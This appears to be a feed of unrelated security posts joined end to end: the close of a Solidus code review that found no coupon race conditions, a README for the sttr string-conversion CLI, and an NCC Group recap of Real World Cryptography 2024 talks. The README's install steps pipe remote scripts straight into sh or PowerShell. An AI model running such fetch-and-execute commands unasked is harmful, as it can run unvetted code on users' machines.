Then simply look for the error in the entire project code and then trace its use backwards to the method which checks the use of the coupon

It’s quite difficult to go into detail and explain all the checks but we can summarize by simply explaining that a coupon is associated with a specific order and as soon as we try to apply a new coupon, the code checks if it is already associated with the order or not.
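To show what such a check has to guarantee, here is a deliberately simplified Python sketch of a check-then-apply step under concurrency. It is not the Solidus or Spree code: the class `CouponOrder`, the in-memory set and the coupon code are assumptions, and the lock stands in for whatever atomicity a real database-backed application would have to get from its database.

```python
import threading


class CouponOrder:
    """Toy order that allows each coupon code to be applied only once."""

    def __init__(self) -> None:
        self.coupons = set()
        self._lock = threading.Lock()

    def apply_coupon(self, code: str) -> bool:
        # The check and the update happen under one lock, so two concurrent
        # requests cannot both observe "not yet applied".
        with self._lock:
            if code in self.coupons:
                return False  # "already been applied to this order"
            self.coupons.add(code)
            return True


order = CouponOrder()
results = []


def worker() -> None:
    results.append(order.apply_coupon("SUMMER10"))


threads = [threading.Thread(target=worker) for _ in range(8)]
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()

print(results.count(True))
```

A race condition appears when the check and the update are separate steps with nothing making them atomic; that gap is what a tester tries to hit by sending the same coupon in parallel requests.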

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but we understand from reading these lines that the main building blocks of Solidus are rather robust and that on a default installation, I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. In Solidus, extensions can be grouped into three types:

  • Official integrations : Listed on the main website, mainly extensions for payments
  • Community Extensions : Listed on a dedicated GitHub repository, a wide variety of extensions that are more or less maintained
  • Other Extensions : Extensions found elsewhere, but there’s no guarantee that they’ll work or that they’ll be supported

Almost all official extensions require integration with a third party and will therefore make requests to a third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions to test a few extensions for which I would have liked to have native functionality on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for 2 years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed …

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins, such as Solidus Friendly Promotions, replace Solidus core features according to their documentation and are therefore inherently more likely to introduce a vulnerability.

Conclusion

Presenting all the tests that can and have been carried out is also far too time-consuming. Code analysis really is time-consuming, so to claim that I’ve been exhaustive and analyzed the whole application would be false but, after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to have been able to detail a few vulnerabilities, but this blog post tends to show that you can’t always be fruitful.


Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Sttr - Cross-Platform, Cli App To Perform Various Operations On String


sttr is a command-line tool that lets you quickly run various transformation operations on strings.


// With input prompt
sttr

// Direct input
sttr md5 "Hello World"

// File input
sttr md5 file.text
sttr base64-encode image.jpg

// Reading from other commands such as cat, curl, printf, etc.
echo "Hello World" | sttr md5
cat file.txt | sttr md5

// Writing output to a file
sttr yaml-json file.yaml > file-output.json

:movie_camera: Demo

:battery: Installation

Quick install

You can run the curl command below to install it somewhere in your PATH for easy use. Ideally it will be installed in the ./bin folder.

curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

Webi

MacOS / Linux

curl -sS https://webi.sh/sttr | sh

Windows

curl.exe https://webi.ms/sttr | powershell

Homebrew

If you are on macOS and using Homebrew, you can install sttr with the following:

brew tap abhimanyu003/sttr
brew install sttr

Snap

sudo snap install sttr

Arch Linux

yay -S sttr-bin

Scoop

scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
scoop install sttr

Go

go install github.com/abhimanyu003/sttr@latest

Manually

Download the pre-compiled binaries from the Releases page and copy them to the desired location.

:books: Guide

  • After installation, simply run the sttr command.
// For interactive menu
sttr
// Provide your input
// Press Enter twice to open the operation menu
// Press `/` to filter operations.
// You can also use the Up/Down arrows to select an operation.
  • Working with help.
sttr -h

// Example
sttr zeropad -h
sttr md5 -h
  • Working with file input.
sttr {command-name} {filename}

sttr base64-encode image.jpg
sttr md5 file.txt
sttr md-html Readme.md
  • Writing output to file.
sttr yaml-json file.yaml > file-output.json
  • Taking input from another command.
curl https://jsonplaceholder.typicode.com/users | sttr json-yaml
  • Chaining different operations.
sttr md5 hello | sttr base64-encode

echo "Hello World" | sttr base64-encode | sttr md5
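For readers who want to see what such a chain computes, the following Python sketch reproduces the two pipelines with the standard library. It is an approximation rather than sttr's implementation: it assumes that the md5 operation emits a lowercase hex digest and that no trailing newline is added between stages, neither of which is confirmed here.

```python
import base64
import hashlib


def md5_hex(data: bytes) -> bytes:
    """MD5 digest as lowercase hex bytes (assumed to match `sttr md5`)."""
    return hashlib.md5(data).hexdigest().encode("ascii")


def base64_encode(data: bytes) -> bytes:
    """Standard Base64 encoding (assumed to match `sttr base64-encode`)."""
    return base64.b64encode(data)


def chain(data: bytes, *operations) -> bytes:
    """Feed the output of each operation into the next, like a shell pipe."""
    for operation in operations:
        data = operation(data)
    return data


# sttr md5 hello | sttr base64-encode
first = chain(b"hello", md5_hex, base64_encode)

# echo "Hello World" | sttr base64-encode | sttr md5
# (echo would append a newline; this sketch hashes the exact bytes given)
second = chain(b"Hello World", base64_encode, md5_hex)

print(first.decode(), second.decode())
```

The order of operations matters: the first chain encodes a digest, while the second hashes an encoding, so the two results differ even for the same input.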

:boom: Supported Operations

Encode/Decode

  • [x] ascii85-encode - Encode your text to ascii85
  • [x] ascii85-decode - Decode your ascii85 text
  • [x] base32-decode - Decode your base32 text
  • [x] base32-encode - Encode your text to base32
  • [x] base64-decode - Decode your base64 text
  • [x] base64-encode - Encode your text to base64
  • [x] base85-encode - Encode your text to base85
  • [x] base85-decode - Decode your base85 text
  • [x] base64url-decode - Decode your base64 url text
  • [x] base64url-encode - Encode your text to base64 url
  • [x] html-decode - Unescape your HTML
  • [x] html-encode - Escape your HTML
  • [x] rot13-encode - Encode your text to ROT13
  • [x] url-decode - Decode URL entities
  • [x] url-encode - Encode URL entities

Hash

  • [x] bcrypt - Get the Bcrypt hash of your text
  • [x] md5 - Get the MD5 checksum of your text
  • [x] sha1 - Get the SHA1 checksum of your text
  • [x] sha256 - Get the SHA256 checksum of your text
  • [x] sha512 - Get the SHA512 checksum of your text

String

  • [x] camel - Transform your text to CamelCase
  • [x] kebab - Transform your text to kebab-case
  • [x] lower - Transform your text to lower case
  • [x] reverse - Reverse Text ( txeT esreveR )
  • [x] slug - Transform your text to slug-case
  • [x] snake - Transform your text to snake_case
  • [x] title - Transform your text to Title Case
  • [x] upper - Transform your text to UPPER CASE

Lines

  • [x] count-lines - Count the number of lines in your text
  • [x] reverse-lines - Reverse lines
  • [x] shuffle-lines - Shuffle lines randomly
  • [x] sort-lines - Sort lines alphabetically
  • [x] unique-lines - Get unique lines from list

Spaces

  • [x] remove-spaces - Remove all spaces + new lines
  • [x] remove-newlines - Remove all new lines

Count

  • [x] count-chars - Find the length of your text (including spaces)
  • [x] count-lines - Count the number of lines in your text
  • [x] count-words - Count the number of words in your text

RGB/Hex

  • [x] hex-rgb - Convert a #hex-color code to RGB
  • [x] hex-encode - Encode your text to Hex
  • [x] hex-decode - Convert Hexadecimal to String

JSON

  • [x] json - Format your text as JSON
  • [x] json-escape - JSON Escape
  • [x] json-unescape - JSON Unescape
  • [x] json-yaml - Convert JSON to YAML text
  • [x] json-msgpack - Convert JSON to MSGPACK
  • [x] msgpack-json - Convert MSGPACK to JSON

YAML

  • [x] yaml-json - Convert YAML to JSON text

Markdown

  • [x] markdown-html - Convert Markdown to HTML

Extract

  • [x] extract-emails - Extract emails from given text
  • [x] extract-ip - Extract IPv4 and IPv6 from your text
  • [x] extract-urls - Extract URLs from your text ( we don't do ping check )

Other

  • [x] escape-quotes - escape single and double quotes from your text
  • [x] completion - generate the autocompletion script for the specified shell
  • [x] interactive - Use sttr in interactive mode
  • [x] version - Print the version of sttr
  • [x] zeropad - Pad a number with zeros
  • [x] and adding more....

Featured On

These are the few locations where sttr was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr to the list.



Real World Cryptography Conference 2024

7 June 2024 at 16:00

This year’s Real World Cryptography Conference recently took place in Toronto, Canada. As usual, this conference organized by the IACR showcased recent academic results and industry perspectives on current cryptography topics over three days of presentations. A number of co-located events also took place before and after the conference, including the FHE.org Conference, the Real World Post-Quantum Cryptography (RWPQC) Workshop and the High Assurance Crypto Software (HACS) Workshop.

A number of NCC Group’s Cryptography Services team members attended the conference and several of the workshops this year. Some of our favorite talks and takeaways are summarized in this post.

Post-Quantum Cryptography

At this year’s Real World Cryptography conference, post-quantum cryptography was strongly represented. With two PQC sessions during the main conference itself, as well as the co-located RWPQC event which took place on the Sunday before the main conference, it was exciting to see so much engagement on the PQC front during our trip to Toronto!

Following the blueprint from last year’s event, the RWPQC workshop opened with an update on the NIST PQC competition, which reiterated its current status and NIST’s goal of producing the final standards for the NIST FIPS 203 and 204 drafts within the next few months, followed by an initial draft for the Falcon specification, under the name FN-DSA. This was followed by updates from other standardization bodies including ETSI, BSI, NCSC, and the IETF, which are all working towards providing PQC guidance in their respective areas of influence with the final FIPS drafts expected soon. MITRE and the Linux Foundation PQC migration consortiums both also gave updates during the workshop. As part of these talks, many standards bodies discussed their approach to the migration and whether or not they plan to mandate the use of hybrid algorithms, with approaches varying from required hybridization to weaker mandates on this front. Additionally, a number of the talks noted that while the use of hybrid algorithms may be helpful in the short term, the community should start considering eventual plans to migrate to a single set of algorithms post-hybridization, citing concerns about increased complexity or combinatorial expansion of algorithms as new algorithms get introduced in the future.

As a counterpart to the presentations by standardization bodies, the RWPQC program included real-world updates about the progress of the PQC migration at various companies, including Signal, Amazon, Google, Meta, and evolutionQ. All talks provided valuable insights as to the challenges, both already overcome and those that are yet to come, for migrating to PQC in their respective settings. Finally, a few more academic talks on lattice cryptanalysis and implementation footguns rounded off the program. We’ll do a slightly deeper dive for some of our favorite talks!

Lattice Cryptanalysis Talks

Martin Albrecht and John Schanck presented two complementary discussions on topics in lattice cryptanalysis. In the first presentation, Martin Albrecht did a deep dive into the analysis of the current best known attack for lattice cryptosystems, known as the dual attack, starting with a brief history of the primal and dual attacks, and noting some recent works that questioned the accuracy of some common heuristics, resulting in improved analyses for these dual algorithms. Martin also noted that there doesn’t seem to be a clear reason why the dual attacks appear to perform better than the primal attacks, noting that “it seems morally wrong that the dual attack would beat the primal attack”, since it introduces additional transformations over the direct approaches. Finally, the presentation concluded with a discussion of recent lattice attacks leveraging machine learning models, noting that in his opinion there is currently no reason to believe that ML can threaten lattice cryptosystems.

John Schanck’s following talk focused on the “real cost” of the best-known attacks. The NIST security levels I, III and V aim to guide protocol designers to select parameters which offer guarantees of security matching the cost of the best-known attacks against AES-128, 192 and 256 respectively. However, unlike attacks on AES, the dual-lattice attack has an incredibly expensive and memory-hungry sieving step. To attack Kyber and related schemes, one must perform a huge amount of computation before any progress is made on reducing the key-space (compare this to attacking AES, where you can immediately start guessing keys). The talk featured fun comparisons (a Moon’s weight of silicon would be needed to fabricate enough memory for the naive implementation of the dual-attack) and really demonstrated how challenging it is to align the real cost of attacking different cryptographic protocols when the attacks themselves are structured so differently at the algorithmic level. The take-home message from Schanck’s talk was that when memory cost is taken into account, Kyber 768 should be enough for everyone.

Implementation Footguns for Post-Quantum Cryptography

Nadia Heninger presented a very detailed discussion about potential pitfalls she foresees as issues for post-quantum implementations, primarily based on her experiences with implementations of classical cryptography. She noted that many common classes of implementation pitfalls in classical cryptography are still applicable in PQC settings, including RNG issues, issues with sampling or uniformity of distributions (which may be even trickier in the PQC settings, as many lattice schemes require sampling from multiple distributions), API misuse, and missing validation checks, which can be tricky to enforce via tests. This talk resonated with us, as we have already started seeing some of these issues in the post-quantum projects that we have reviewed so far. Finally, her discussion noted that the increased implementation complexity for PQC schemes may be a blessing in disguise, as the more complicated an algorithm seems, the less likely people are to try to implement it themselves, and instead rely on existing implementations, which may end up helping avoid many of these potential issues at scale!

Making Signal Messenger Post Quantum / Making Encrypted Messaging Post Quantum

Rolfe Schmidt gave a fantastic talk on the upgrade to Signal messenger to begin the inclusion of post-quantum cryptography into the key-agreement stage of the protocol, now known as PQXDH. The talk motivated this change as a protection against “harvest-now, decrypt-later” attacks, with a design philosophy of changing only what strictly needs to be changed to achieve protection against a quantum adversary. Although the key agreement now includes a hybridized protocol using post-quantum algorithms, the ratcheting algorithm is still classical only, and so the classical guarantees of the Signal protocol are still not quite aligned with the post-quantum guarantees. Ensuring the ratchet is post-quantum secure is a work in progress for the Signal team, who hope to ensure that messaging performance is not affected by the inclusion of Kyber in the ratcheting mechanism. The design documentation is now available in the PQXDH Specification.

In addition to the design and implementation of PQXDH, Signal collaborated with academia to produce a formally verified implementation of PQXDH using both ProVerif and CryptoVerif. Signal explained that through the process of formally verifying the protocol, they not only gained confidence in the changes, but verification also highlighted parts of the specification which had been under-described and could have led to attacks if misinterpreted. The process thus not only added support for the validity of the design but also acted as a guide for a robust description of PQXDH for developers in the future.

Conclusion

Overall, it’s very exciting to be seeing so much movement in real-world post-quantum applications. We are looking forward to future PQC updates at RWC, RWPQC and elsewhere, and to reviewing PQC projects that come our way!

– Giacomo Pope and Elena Bakos Lang

Key and Certificate Transparency

Key and certificate transparency was a hot topic at this year’s conference. The Levchin Prize was awarded to the team at Google responsible for “creating and deploying Certificate Transparency at scale”. In addition to the public recognition of what that work has pioneered, three talks were scheduled about different aspects of modern transparency solutions.

Invited talk: Key transparency: introduction, recent results, and open problems

The first talk by Melissa Chase from Microsoft Research delved into recent results and open problems in Key Transparency. In modern encrypted messaging deployments, a service provider is generally responsible for distributing users’ public keys. However, what if a man-in-the-middle attacker were to intercept (and meddle with) the public key of the recipient that a sender is trying to establish a secure communication with? Or worse, what if the server were to get compromised? In an end-to-end encrypted messaging setting, key transparency aims to solve this problem of trusted public key distribution which is often glossed over in academic works.

Until recently, the industry solution to the key transparency question was some form of out-of-band verification, in which users can display a fingerprint corresponding to the chat’s encryption key and compare it with one another. Subsequent deployments have made comparing these traditionally long numerical codes easier by displaying a QR code that can be verified when both users are physically close to each other. These solutions can be slightly tedious for users and the industry has started to deploy large-scale and automatic key transparency solutions based on relatively recent academic works such as CONIKS.

In some of these modern key transparency deployments, service providers provide a publicly accessible key directory which keeps track of users’ public keys. Users can then ensure that the key they hold for a given contact is consistent with the key tracked in the latest version of the online key directory. However, granting people access to public key repositories needs to be done while still maintaining user privacy. Indeed, the deployment of such systems should not make it easier for anyone to be able to track individual users’ actions, for example by figuring out when they refresh their keys (if they get a new device for instance) or by allowing attackers to find out which users are participating in the system by identifying personal information (such as phone numbers or email addresses) in the key directory.

In order to realize the goals outlined above, key transparency deployments make use of a few interesting cryptographic primitives. Service providers generally publish a key directory together with a commitment to that directory. In practice, this is usually achieved with a Sparse Merkle Tree, and the commitment is the root of that Merkle Tree. In early academic proposals, the server would post a commitment to the current key directory at regular intervals. New developments (such as SEEMless) propose that the server publish commitments to the incremental changes to the key directory, lowering the computational effort needed to audit the key transparency tree (since the entire tree does not have to be recomputed and verified). To safeguard the privacy of users, modern key transparency deployments use Verifiable Random Functions (VRFs), which can be thought of as the public key variant of a hash function. In a VRF, only the private key owner may compute the hash output and its associated proof, but anyone can use the associated public key to verify that the output was calculated correctly. If the leaves of the Merkle tree were computed from the identifying information of users, for example by simply hashing some form of identifier, attackers could easily collect information about users. Using a VRF construction makes it possible to conceal that information, by essentially randomizing the leaf positions in the Merkle tree. Melissa rounded off the literature review portion of her talk by presenting OPTIKS, a performant new key transparency solution which focuses on scalability, and which Melissa contributed to.
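The directory commitment and the privacy-preserving leaf placement described above can be sketched in a few lines of Python. This is a minimal illustration under loud assumptions: it builds a plain (dense) Merkle tree rather than a Sparse Merkle Tree, and it uses HMAC as a stand-in for a VRF. HMAC hides the identifier in the same way, but unlike a real VRF it produces no proof that a third party could verify with a public key. The names `leaf_index`, `merkle_root` and `commit` are hypothetical and not taken from any of the systems mentioned.

```python
import hashlib
import hmac


def leaf_index(server_secret: bytes, user_id: str) -> bytes:
    # Stand-in for a VRF output: keyed, so outsiders cannot recompute it from
    # the identifier alone. A real VRF would also return a verifiable proof.
    return hmac.new(server_secret, user_id.encode(), hashlib.sha256).digest()


def merkle_root(leaves: list[bytes]) -> bytes:
    # Plain binary Merkle tree with domain-separated leaf and node hashes.
    if not leaves:
        return hashlib.sha256(b"").digest()
    level = [hashlib.sha256(b"\x00" + leaf).digest() for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])  # duplicate the last node on odd levels
        level = [
            hashlib.sha256(b"\x01" + level[i] + level[i + 1]).digest()
            for i in range(0, len(level), 2)
        ]
    return level[0]


def commit(directory: dict[str, bytes], server_secret: bytes) -> bytes:
    # Each entry is (pseudorandom index || hash of the public key); sorting by
    # index makes the commitment independent of insertion order.
    entries = sorted(
        leaf_index(server_secret, uid) + hashlib.sha256(key).digest()
        for uid, key in directory.items()
    )
    return merkle_root(entries)


directory = {"alice": b"alice-public-key", "bob": b"bob-public-key"}
root = commit(directory, b"demo-secret")
tampered = commit({**directory, "bob": b"attacker-key"}, b"demo-secret")
print(root != tampered)  # a swapped key changes the published commitment
```

Because the root changes whenever any key changes, a user who remembers an earlier commitment can detect a silent key replacement, which matches the detection (rather than prevention) guarantee discussed in the talk.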

While many of the technical aspects of key transparency seem to be well ironed-out in theory, there are still a number of open questions and practical aspects that require further engineering efforts. To start, how to effectively instantiate the bulletin board, that publicly accessible key directory that should be efficiently and consistently accessed by users? A second crucial and often overlooked point is that of auditors. One common goal of these key transparency deployments is to provide the ability for auditors to validate the consistency of the key directory. But who are these auditors in practice, and what incentives do they have for performing costly validation work? And if they were to identify any wrongdoing, who would they even report such issues to? A third open question Melissa raised was around the security guarantees of such systems and whether stronger security notions could be obtained. For example, in current schemes, users will detect if a service provider maliciously replaces a user’s key but users themselves can’t prevent it.

WhatsApp Key Transparency

Later that day, Kevin Lewi and Sean Lawlor presented WhatsApp’s Key Transparency solution. Recent updates to WhatsApp added a feature to automatically validate users’ public keys based on a key transparency deployment following many of the concepts presented above. Previously, out-of-band verification used to be available to chat users, but automatic public key verification was recently added. Now, servers publish a commitment to the public key database, and, supported by UI updates in the app, the validity of a contact’s key is automatically checked when users access the “Encryption” menu of their contacts.

The presentation explored the different technical aspects this deployment necessitated, such as the infrastructure challenges to support these updates as well as the frequency at which they need to be updated. The speakers then presented some of the underlying cryptographic constructions used by the deployment. The system uses Sparse Merkle trees and VRFs in a fashion similar to SEEMless, and publishes incremental updates to the key transparency tree in the form of append-only proofs, which are about 200 MB each and are published at approximately 5-minute intervals.

Kevin and Sean concluded their presentation by advertising the release of their implementation of the auditable key directory (accessible at https://github.com/facebook/akd), which is what WhatsApp uses in production for their key transparency deployment and which can also be used to verify the consistency proofs by external auditors. Members of NCC Group’s Cryptography Services team reviewed the implementation a few months before the conference; the public report can be found on NCC’s research platform: Public Report – WhatsApp Auditable Key Directory (AKD) Implementation Review.

Modern transparency logs

Finally, on the last day of the conference, Filippo Valsorda gave a talk on Modern Transparency Logs. Drawing parallels with key transparency solutions, Filippo kicked off his talk by framing transparency logs as a reusable primitive; a magic global append-only list of entries essentially defined by three fundamental questions: what are the entries, who can add them, and who monitors these entries? Different transparency solutions (such as the Go checksum database which Filippo used repeatedly as example throughout his presentation) are ultimately defined by the answers to these questions.

When building transparency log solutions, a fundamental type of attack that must be prevented is the ability to present different views of the system logs to different users, which is known as a split view attack. In a key transparency deployment for example, one could imagine a compromised (or rogue) server advertising a different public key for a target victim. There are a few ways to counter split view attacks. The first is to ensure local consistency (for example with an append-only log), the second is peer-to-peer gossip, where peers communicate amongst themselves to ensure they are being served the same system view, and the third is witness cosigning. Witnesses are lightweight, third-party entities responsible for verifying consistency proofs between consecutive Merkle tree roots, and which will cosign that new tree head. Given a network of witnesses, more complex policies can be developed such as requiring a threshold of M-out-of-N signers in order for the tree head to be considered validated.
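The M-out-of-N witness policy can be illustrated with a short Python sketch. It is only a sketch: HMAC stands in for the witnesses' signatures so that the example runs with the standard library, whereas a real deployment would use public-key signatures so that clients never hold witness secrets. The function names and the witness names are hypothetical.

```python
import hashlib
import hmac


def cosign(witness_key: bytes, tree_head: bytes) -> bytes:
    # Stand-in for a witness signature over the tree head.
    return hmac.new(witness_key, tree_head, hashlib.sha256).digest()


def tree_head_accepted(
    tree_head: bytes,
    cosignatures: dict[str, bytes],
    witness_keys: dict[str, bytes],
    threshold: int,
) -> bool:
    # Count cosignatures from known witnesses that verify for this exact head.
    valid = 0
    for name, key in witness_keys.items():
        sig = cosignatures.get(name)
        if sig is not None and hmac.compare_digest(sig, cosign(key, tree_head)):
            valid += 1
    return valid >= threshold


witness_keys = {"w1": b"key-1", "w2": b"key-2", "w3": b"key-3"}
honest_head = hashlib.sha256(b"log state seen by everyone").digest()
split_head = hashlib.sha256(b"log state shown to one victim").digest()

# Two of the three witnesses cosign the honest head.
sigs = {name: cosign(witness_keys[name], honest_head) for name in ("w1", "w2")}

print(tree_head_accepted(honest_head, sigs, witness_keys, threshold=2))  # True
print(tree_head_accepted(split_head, sigs, witness_keys, threshold=2))   # False
```

The second check fails because cosignatures are bound to one specific tree head, so a server showing a victim a different head cannot reuse them.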

Filippo then proceeded to advertise a number of specifications and work-in-progress items to support modern transparency log deployments. The first is the checkpoint format specification, which is used to interoperate with the witness ecosystem. Checkpoints are essentially signed notes precisely formatted for use in transparency log applications, and which contain the origin of the checkpoint, the tree size and the root hash, and a number of potential co-signatures on that root hash. Recognizing that a checkpoint coupled with an inclusion proof is everything a client needs to verify inclusion offline, Filippo then introduced the concept of “spicy signatures” (🌶️), which are offline-verifiable proofs of inclusion in a transparency log. He then concluded his talk by presenting a lightweight CLI tool and showing how spicy signatures can be used efficiently in existing deployments, for example by bringing transparency to the Debian package ecosystem in only a few hours.
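To make the checkpoint contents concrete, here is a hedged Python sketch of a parser. The layout it assumes (origin, decimal tree size and base64 root hash on three lines, then a blank line, then signature lines) is an assumption for illustration and should be checked against the actual checkpoint specification. The parser treats signature lines as opaque strings and verifies nothing; the origin `example.com/log` and the placeholder signature line are made up.

```python
import base64
import hashlib
from dataclasses import dataclass


@dataclass
class Checkpoint:
    origin: str
    tree_size: int
    root_hash: bytes
    signature_lines: list[str]


def parse_checkpoint(text: str) -> Checkpoint:
    # Split the body from the signature block at the first blank line.
    body, _, sigs = text.partition("\n\n")
    lines = body.split("\n")
    if len(lines) < 3:
        raise ValueError("checkpoint body needs origin, tree size and root hash")
    origin, size, root = lines[0], lines[1], lines[2]
    return Checkpoint(
        origin=origin,
        tree_size=int(size),
        root_hash=base64.b64decode(root),
        signature_lines=[line for line in sigs.split("\n") if line],
    )


# Hypothetical checkpoint built for the demo; the root hash is just a digest.
demo_root = hashlib.sha256(b"demo").digest()
demo_text = (
    "example.com/log\n42\n"
    + base64.b64encode(demo_root).decode()
    + "\n\n<signature line 1>\n"
)

cp = parse_checkpoint(demo_text)
print(cp.origin, cp.tree_size, len(cp.root_hash))  # example.com/log 42 32
```

A client would then check the signature lines against the log's and witnesses' public keys, and verify an inclusion proof against `root_hash`, neither of which is shown here.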

– Paul Bottinelli

Symmetric Encryption

This year’s symmetric encryption session reinforced the motivations for modernizing our security requirements and design philosophy when it comes to symmetric primitives and modes of operation based on lessons learned and changing requirements over the past 20 years.

Building the Next Generation of AEAD

The symmetric cryptography session was opened by Sanketh Menda, who closed out last year’s event with a presentation on “context-committing” AEADs, or authenticated encryption with associated data, which acknowledges the need for standardized constructions that commit the complete “context” of an AEAD (e.g., the key and nonce). In his update this year, “Building the Next Generation of AEAD”, a broader set of goals was presented:

  • We sometimes need a fast approach for lightweight devices;
  • We sometimes need a suitable approach for cloud-scale data;
  • We sometimes need nonce-misuse resistance;
  • We sometimes need a nonce-hiding scheme;
  • And as established last time, we sometimes need context commitment.

And is there one ideal scheme to rule them all? Of course not… However, there may be a new approach to designing a family of schemes that facilitates safer use. To this end, a “flexible AEAD” construction is proposed which presents an implementer with a single set of binary choices corresponding to various security properties, thereby allowing a developer to express their intent, rather than to choose and compose various modes of operation. Sanketh then presents a series of primitives that can be composed in standard ways to achieve these various security goals.

With two excellent back-to-back presentations on the topic, I’m hoping we’ll get to hear a progress update from Sanketh again next year.

What’s wrong with Poly1305?

Jan Gilcher and Jérôme Govinden followed up with a presentation looking back on the development and deployment of Poly1305, asking a fundamental question: “Given today’s advancements and applications would we still converge to this same design?”. This is initially motivated by observations that Poly1305 sacrifices a degree of security in favor of speed on a 32-bit platform using optimizations in the floating-point unit, whereas most modern platforms are 64-bit and leverage the arithmetic logic unit for optimized Poly1305 computations. So how would we build and optimize a Poly1305-like construction on today’s hardware?

Much like the preceding talk, the authors consider a modular construction for a family of polynomial-based hashes, from which Poly1305 and other similar schemes can be implemented based on a set of input parameters. This allows for the efficient testing and comparison of a broad family of implementations which can be tweaked between favoring security level and speed on a given platform. While such an approach does not outperform a hand-optimized implementation of a specific function, it appears to achieve impressive results based on the flexibility it provides.
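As a rough illustration of what a parameterized polynomial hash looks like, the Python sketch below factors the polynomial evaluation into a generic `poly_hash` function taking the prime and block size as inputs, and then instantiates it with the standard Poly1305 parameters (prime 2^130 - 5, 16-byte blocks, clamped `r`). This is not the authors' framework: the function names are hypothetical, the parameters of their other variants are not reproduced here, and Python integers are neither fast nor constant-time.

```python
def poly_hash(msg: bytes, r: int, prime: int, block_bytes: int) -> int:
    # Evaluate the message as a polynomial in r modulo the prime, one block at
    # a time, using Horner's rule.
    acc = 0
    for i in range(0, len(msg), block_bytes):
        # The appended 0x01 byte marks the end of the block.
        block = msg[i:i + block_bytes] + b"\x01"
        acc = (acc + int.from_bytes(block, "little")) * r % prime
    return acc


def poly1305(key: bytes, msg: bytes) -> bytes:
    # Poly1305 as one instance of the family: clamp r, hash, then add s.
    r = int.from_bytes(key[:16], "little") & 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF
    s = int.from_bytes(key[16:32], "little")
    tag = (poly_hash(msg, r, (1 << 130) - 5, 16) + s) % (1 << 128)
    return tag.to_bytes(16, "little")


# Test vector from RFC 8439, section 2.5.2.
key = bytes.fromhex(
    "85d6be7857556d337f4452fe42d506a8"
    "0103808afb0db2fd4abff6af4149f51b"
)
print(poly1305(key, b"Cryptographic Forum Research Group").hex())
# a8061dc1305136c6c22b8baf0c0127a9
```

Swapping the prime, block size or clamping mask passed to `poly_hash` gives other members of the family, which is the kind of tweak the modular construction is meant to make easy to test and compare.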

Leveraging their new construction, the authors present a variant, Poly1163, which is better optimized for current hardware at a similar security level to Poly1305. Impressively, despite not being hand-optimized at all, this variant outperforms OpenSSL’s Poly1305 implementation. On the other end of the design spectrum, the authors also present Poly1503, which focuses on providing higher bit-security by not clamping inputs in the same manner as Poly1305 without a substantial hit to performance.

I want to encrypt 2^64 bytes with AES-GCM using a single key

Shay Gueron closed out the session with his presentation “I want to encrypt 2^64 bytes with AES-GCM using a single key”, which proposes a new mode of operation for AES called double nonce double key (DNDK), purpose-built to extend AES-GCM to support modern cloud-scale encryption tasks using a single key.

AES-GCM is the most widely used AEAD we encounter and is generally a safe choice for most applications when used correctly. However, GCM has a few well-known limitations: The 12 byte initialization value (IV) limits the number of invocations that can be made with a single key, and GCM out of the box does not provide key commitment, meaning that an attacker can produce a single authenticated ciphertext that decrypts to two different messages under two different nonce+key combinations. It is precisely these two problems that DNDK addresses, while striving to remain as close as possible to the GCM construction itself.

In practice, the concept is simple: If the short IV (nonce) is holding us back, then simply make it bigger, say, double its size. But a “double nonce” isn’t quite enough with GCM, since the first internal step is to hash it down to its original smaller size. Instead, we can use AES itself to build a key derivation function that takes as input the “double nonce” and the encryption key and derives an invocation-specific encryption key. In short, we use our double-nonce-derived-key to encrypt our message, and we have DNDK. And as a bonus, DNDK supports key commitment out of the box as well, as an optional output parameter. This incurs little practical overhead and does not rely on any additional cryptographic primitives to achieve its security.
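To see why the nonce length matters, a back-of-the-envelope birthday-bound calculation helps. The Python sketch below computes an upper bound on the probability that two randomly chosen nonces collide under one key, for a 12-byte nonce and for a doubled, 24-byte one. It only models random nonce collisions. It is not the security bound of DNDK itself, and the function name is hypothetical.

```python
def log2_collision_bound(nonce_bits: int, log2_messages: int) -> int:
    # Birthday bound: with n random nonces of b bits, the collision
    # probability is at most n^2 / 2^(b+1), so log2(p) <= 2*log2(n) - b - 1.
    return 2 * log2_messages - nonce_bits - 1


# 2^32 messages under one key:
print(log2_collision_bound(96, 32))   # -33  (12-byte nonce)
print(log2_collision_bound(192, 32))  # -129 (24-byte nonce)

# 2^48 messages under one key:
print(log2_collision_bound(96, 48))   # -1   (collision is likely)
print(log2_collision_bound(192, 48))  # -97
```

With 96-bit random nonces the bound becomes uncomfortable well before cloud-scale message counts, while doubling the nonce length pushes it far out of reach.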

Shay and friends at Meta have provided an optimized open-source implementation of DNDK-GCM, alongside implementations of AES-GCM and AES-GCM-SIV for comparison. A draft RFC has also been published to guide those wishing to implement DNDK for themselves. The Crypto Services team is proud to have supported the development of the DNDK draft RFC, with team members Gérald Doussot, Thomas Pornin, and Eric Schorn being formally acknowledged in the draft RFC.

– Kevin Henry

Real World Cryptography 2025

We look forward to catching up with everyone next year in Sofia, Bulgaria!

Announcing AI/ML safety and security trainings

7 June 2024 at 13:00

By Michael D. Brown

We are offering AI/ML safety and security training in summer and fall of this year!

